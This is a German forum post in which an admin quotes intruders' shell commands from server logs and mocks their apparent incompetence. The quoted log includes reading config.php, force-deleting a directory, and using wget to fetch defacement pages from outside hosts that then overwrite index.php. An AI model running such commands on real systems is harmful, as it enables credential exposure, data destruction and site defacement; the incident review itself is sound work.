[Dumdideldum]

@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus

Zitat:

ls
cat config.php
ls
rm -R -f sigs
ls
wget www.ghosn.org/shk2.html
ls
pico shk2.html
cat shk2.html
wget http://willysbirthday.com/hacked.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
mv boxoesx.gif /images
mv boxoesx.gif images/
wget www.ghosn.org/shk2.swf
ls

Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?